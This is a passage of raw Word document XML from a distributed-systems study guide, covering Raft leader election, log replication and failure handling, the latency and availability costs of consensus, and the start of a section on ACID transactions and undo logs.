      </w:r>
    </w:p>
    <w:p w14:paraId="50B4D522" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If no: execute and store the result keyed by the request ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446152AB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Now retrying is always safe — the operation happens exactly once regardless of how many times it's submitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD3160" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="1F6FBA83">
          <v:rect id="_x0000_i2935" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C261C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Consensus — Making Reliable Decisions in Unreliable Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5EF222" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Why Consensus is Necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C0D1F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Multiple nodes must agree on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26102106" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Who is the leader (leader election).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CFB6F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The order of operations (total ordering).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AA64F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Whether a transaction committed or aborted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF025A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The current membership of the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E17446" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Without consensus, nodes diverge — each makes independent decisions leading to inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24367DE5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Raft Consensus — How It Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59887336" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nodes have three roles:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Leader, Follower, Candidate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8C139" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Leader Election:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9830B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>All nodes start as followers with a random election timeout (e.g., 150–300ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078526F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If a follower receives no heartbeat from the leader before its timeout → becomes Candidate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A33E59D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Candidate increments its </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>term</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> number, votes for itself, sends RequestVote to all peers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC6764" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Other nodes grant their vote if: they haven't voted in this term AND the candidate's log is at least as up-to-date as their own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15173961" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If candidate receives majority votes → becomes Leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700EDBE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If election timeout expires without majority → new election with higher term.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD7202" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Leader sends periodic heartbeats (empty AppendEntries) to prevent new elections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB845A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why random timeouts prevent split votes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4511516E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If all nodes time out simultaneously, all become candidates, split the votes, nobody wins. Random timeouts ensure one node typically times out first, winning the election before others try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446DAF8B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log Replication (the core reliability mechanism):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF44562" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client sends a write to the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C168AEE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Leader appends the entry to its local log (uncommitted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DCAD7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Leader sends AppendEntries RPC to all followers with the new entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F89D3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Followers append to their logs and acknowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B4ADD6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Once the leader receives acknowledgment from a majority (including itself):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DB6A6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The entry is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>committed</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (will never be lost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D4B1DB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Leader applies the entry to its state machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B7F734" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Leader responds to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649334CB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Leader notifies followers to commit (in the next heartbeat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D44B5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The safety guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B21C259" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">Once a log entry is committed (acknowledged by majority), it will be present in ALL future leaders' logs. A node cannot become leader unless its log contains all committed entries. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>This is enforced by the voting rule: "vote only for candidates with logs at least as up-to-date."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929AE11" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens during leader failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F07A4EF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Leader crashes after committing entry #5 locally but before replicating to majority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F27BC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A new leader is elected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB43900" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The new leader's log may or may not have entry #5 (depending on whether it received it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FBAFCE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If majority doesn't have entry #5: it was never committed → it's lost (but the client never received acknowledgment, so from the client's perspective, it timed out — the client should retry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9466F2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If majority has entry #5: the new leader will have it (voting rule ensures this) → it's committed and safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E4E73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 The Cost of Consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554410F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C50A786" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every write requires a majority acknowledgment → at minimum one network round-trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37C008" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>With 5 nodes across AZs (2ms between AZs), commit latency ≥ 2ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECED298" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>With 5 nodes across regions (100ms between regions), commit latency ≥ 100ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71C2F8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51954F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Requires majority (quorum) to make progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D9E339" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>3 nodes: tolerates 1 failure. If 2 are down → cluster is stuck (no progress until one recovers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEECE48" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>5 nodes: tolerates 2 failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C926B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>More nodes = more fault tolerant, but higher latency (must wait for more acknowledgments if quorum is based on a larger set).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3A1326" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When NOT to use consensus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD7173" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>For data that can be eventually consistent (counters, analytics, caches) — consensus is overkill.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5F7AF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>For operations where occasional loss/duplication is acceptable — simpler patterns (async replication + retry) are sufficient and much faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2BC32C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="1C52EEF0">
          <v:rect id="_x0000_i2936" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EB5D95" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Transactions — Ensuring Correctness Across Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A71D480" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 ACID Properties — Deep Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF21542" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Atomicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512647E3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A transaction is all-or-nothing. If a transaction modifies 5 records:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0B12C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Either ALL 5 are modified (commit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B9B96D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Or NONE are modified (abort/rollback).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B7FA2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How atomicity is implemented internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C5F6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Using undo logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24553F20" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Before modifying a record, write the OLD value to the undo log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75636B64" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Make the modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021BC116" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On commit: discard the undo log (changes are permanent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB0FE0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On abort: read the undo log, write old values back (reverting all changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D0EFE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On crash: during recovery, any transaction that was in progress (not committed) is rolled back using its undo log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5188A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB401F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The database transitions from one valid state to another. All integrity constraints (foreign keys, unique constraints, check constraints) are satisfied before AND after the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C7C4DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is primarily an application concern</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the database enforces declared constraints, but the application must ensure business logic correctness.</w:t>
      </w:r>
    </w:p>
